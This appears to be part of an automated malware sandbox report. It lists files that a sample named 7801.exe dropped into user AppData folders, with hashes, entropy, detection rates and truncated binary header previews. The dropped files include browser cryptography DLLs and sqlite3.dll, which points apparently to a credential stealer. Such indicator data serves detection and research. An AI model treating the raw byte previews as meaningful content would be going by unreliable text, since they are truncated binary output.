                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{*7.{*7.{*..x+>.{*..~+I.{*...+%.{*.x+$.{*..+'.{*.~+..{*..z+4.{*7.z*A.{*..~+>.{*..{+6.{*...*6.{*..y+6.{*Rich7.{*........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\dI3hX2r.zip
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2828315
                                                                                                                                                                                                        Entropy (8bit):7.998625956067725
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
                                                                                                                                                                                                        MD5:1117CD347D09C43C1F2079439056ADA3
                                                                                                                                                                                                        SHA1:93C2CE5FC4924314318554E131CFBCD119F01AB6
                                                                                                                                                                                                        SHA-256:4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
                                                                                                                                                                                                        SHA-512:FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: PK.........znN<..{r....i......nssdbm3.dll...|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K.*...........gr..L..*H...v....6[*...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3.*...S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.|k.5...XF.Y..lVVW..C..|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..|!......O....M....>.>.$\.%..L.zF.l...3
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):334288
                                                                                                                                                                                                        Entropy (8bit):6.808908775107082
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
                                                                                                                                                                                                        MD5:60ACD24430204AD2DC7F148B8CFE9BDC
                                                                                                                                                                                                        SHA1:989F377B9117D7CB21CBE92A4117F88F9C7693D9
                                                                                                                                                                                                        SHA-256:9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
                                                                                                                                                                                                        SHA-512:626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....@.\.........."!.........f...............................................p............@.........................p...P............@..x....................P......0...T...............................@...............8............................text...d........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):132048
                                                                                                                                                                                                        Entropy (8bit):6.627391684128337
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
                                                                                                                                                                                                        MD5:5A49EBF1DA3D5971B62A4FD295A71ECF
                                                                                                                                                                                                        SHA1:40917474EF7914126D62BA7CDBF6CF54D227AA20
                                                                                                                                                                                                        SHA-256:2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
                                                                                                                                                                                                        SHA-512:A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S|.>R..?S;..S..?S|.<R..?S|.:R..?S|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20432
                                                                                                                                                                                                        Entropy (8bit):6.337521751154348
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
                                                                                                                                                                                                        MD5:4FE544DFC7CDAA026DA6EDA09CAD66C4
                                                                                                                                                                                                        SHA1:85D21E5F5F72A4808F02F4EA14AA65154E52CE99
                                                                                                                                                                                                        SHA-256:3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
                                                                                                                                                                                                        SHA-512:5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):55760
                                                                                                                                                                                                        Entropy (8bit):6.738700405402967
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
                                                                                                                                                                                                        MD5:56E982D4C380C9CD24852564A8C02C3E
                                                                                                                                                                                                        SHA1:F9031327208176059CD03F53C8C5934C1050897F
                                                                                                                                                                                                        SHA-256:7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
                                                                                                                                                                                                        SHA-512:92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):22480
                                                                                                                                                                                                        Entropy (8bit):6.528357540966124
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
                                                                                                                                                                                                        MD5:96B879B611B2BBEE85DF18884039C2B8
                                                                                                                                                                                                        SHA1:00794796ACAC3899C1FB9ABBF123FEF3CC641624
                                                                                                                                                                                                        SHA-256:7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
                                                                                                                                                                                                        SHA-512:DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):92624
                                                                                                                                                                                                        Entropy (8bit):6.639527605275762
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
                                                                                                                                                                                                        MD5:94919DEA9C745FBB01653F3FDAE59C23
                                                                                                                                                                                                        SHA1:99181610D8C9255947D7B2134CDB4825BD5A25FF
                                                                                                                                                                                                        SHA-256:BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
                                                                                                                                                                                                        SHA-512:1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24016
                                                                                                                                                                                                        Entropy (8bit):6.532540890393685
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
                                                                                                                                                                                                        MD5:6099C438F37E949C4C541E61E88098B7
                                                                                                                                                                                                        SHA1:0AD03A6F626385554A885BD742DFE5B59BC944F5
                                                                                                                                                                                                        SHA-256:46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
                                                                                                                                                                                                        SHA-512:97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16336
                                                                                                                                                                                                        Entropy (8bit):6.437762295038996
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
                                                                                                                                                                                                        MD5:F3A355D0B1AB3CC8EFFCC90C8A7B7538
                                                                                                                                                                                                        SHA1:1191F64692A89A04D060279C25E4779C05D8C375
                                                                                                                                                                                                        SHA-256:7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
                                                                                                                                                                                                        SHA-512:6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):144848
                                                                                                                                                                                                        Entropy (8bit):6.54005414297208
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
                                                                                                                                                                                                        MD5:4E8DF049F3459FA94AB6AD387F3561AC
                                                                                                                                                                                                        SHA1:06ED392BC29AD9D5FC05EE254C2625FD65925114
                                                                                                                                                                                                        SHA-256:25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
                                                                                                                                                                                                        SHA-512:3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\ucrtbase.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1142072
                                                                                                                                                                                                        Entropy (8bit):6.809041027525523
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                                                                                                                                                                                        MD5:D6326267AE77655F312D2287903DB4D3
                                                                                                                                                                                                        SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                                                                                                                                                                                        SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                                                                                                                                                                                        SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):83784
                                                                                                                                                                                                        Entropy (8bit):6.890347360270656
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                                                                                                                                        MD5:7587BF9CB4147022CD5681B015183046
                                                                                                                                                                                                        SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                                                                                                                                        SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                                                                                                                                        SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):916735
                                                                                                                                                                                                        Entropy (8bit):6.514932604208782
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                                                                                                                                                                        MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                                                                                                                                                                        SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                                                                                                                                                                        SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                                                                                                                                                                        SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8EC4.exe.log
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\8EC4.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):700
                                                                                                                                                                                                        Entropy (8bit):5.346524082657112
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                                        MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                                        SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                                        SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                                        SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):905216
                                                                                                                                                                                                        Entropy (8bit):7.399713113456654
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                                                                        MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                                        SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                                                                        SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                                                                        SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7CA1.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):327680
                                                                                                                                                                                                        Entropy (8bit):5.555665914483739
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:QOWFvVSz4X34ToHWGPOeh20XTF2xi69YPUy0ZPv4J3vfrhVggjcGkNIVqI:QO0sMITBsh20XTIp6M5Pv4tX7ITsq
                                                                                                                                                                                                        MD5:3754DB9964B0177B6E905999B6F18FD7
                                                                                                                                                                                                        SHA1:F47B3FCF01C76AF3B174792519D44171413D25AE
                                                                                                                                                                                                        SHA-256:F56B4C870E0B40ED1BF4F1019346F14443BBE8608D6F75ACB92B176D138F74B7
